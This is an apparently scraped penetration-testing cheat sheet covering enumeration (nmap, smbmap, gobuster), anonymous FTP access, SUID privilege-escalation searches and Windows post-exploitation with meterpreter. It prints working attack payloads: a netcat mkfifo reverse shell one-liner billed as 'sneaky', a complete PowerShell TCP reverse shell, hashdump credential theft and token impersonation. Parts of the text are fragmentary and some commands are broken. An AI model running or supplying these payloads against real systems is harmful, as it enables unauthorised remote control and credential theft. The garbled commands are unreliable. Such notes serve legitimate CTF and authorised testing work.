Skip to content


Documenting different ways to uncover ways to gain intial access and exploiting them.

Table of Contents


As an alternative you can use rustscan -a <address>

Normal scan: nmap -vv -sV -Pn -A -T4 --script vuln <address> Long scan: nmap -sV -Pn -A -T4 -p- <address>


Initial Access

smbmap -H <address> Check discovered directories in other places such as websites. smbclient -L <address> -U List all the directories in the share Enumerate SMB via NMAP: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <address>


Initial Access

Anonymous Login

ftp <address> login: anonymous (no password required)

NMAP Scripts

nmap --script ftp-* -p 21 <address>

Brute Force



Download all files

wget -m ftp://anonymous:anonymous@<address> wget -m --no-passive ftp://anonymous:anonymous@<address>


Initial Access

Directory Discovery

GoBuster: gobuster dirb --url=<address> --wordlist=<wordlist> After running go buster manually explore some interesting directories, such as robots.txt.

Password Discovery

If you are having trouble brute-forcing a password for a blog, try creating a custom wordlist with cewl: cewl -d 3 -m 7 -w <wordlist to export> <>

Reverse Shells

See Reverse Shells for more information.


Check Services and Ports

Running Ports: ss -natu netstat -tulpn | grep LISTEN Forwarding ports through ssh: ssh -L <local port>:<remote address>:<remote port> <username>@<address>


Reverse Shell Upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

Simple HTTP Server

If you need to get a file over to a compromised server with curl installed: python3 -m http.server


find / -user root -perm -4000 -exec ls -ldb {} \; find / -perm -u=s -type f 2>/dev/null BEST: find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000 2>/dev/null

If you find a binary that matches this, you can try running with the -p flag which allows you to run a binary as the owner.

EXAMPLE USES: nmap -i find -exec \;

Sneaky Reverse Shell Bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

Find writable directories

find -type d -writable

Windows Migration

get a meterpreter session and find a process running as SYSTEM: ps safest choice is to choose services.exe migrate <process id>

Windows Passwords

within meterpreter session: hashdump

Using Powershell

load powershell then powershell_shell

Windows Token Exploitation

powershell whoami /priv msf load incognito list_tokens -g then impersonate_token <name of token>


A series of a userful links: - Nishang: A series of useful Windows Exploit scripts - PowerSploit Same as above

Powershell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Starting SMB Server

Navigate to folder to share

python3 /usr/share/doc/impacket-scripts/examples/ SHARE .

Starting FTP Server

Install sudo apt-get install python3-pyftpdlib

python3 -m pyftpdlib -p 21

Pull everything in a folder: `wget -mbr --username="anonymous" --password="" "ftp://



  • Search for command with name: Get-Command *search_parameter*
  • Get all Parameters for a command: (Get-Command Command).Parameters
  • Search for a file: Get-ChildItem -Path C:\ -Include *title* -File -Recurse -ErrorAction SilentlyContinue
  • Search for files containing string: Get-ChildItem C:\* -Recurse | Select-String -pattern search_string
  • Get list of running processes: Get-Process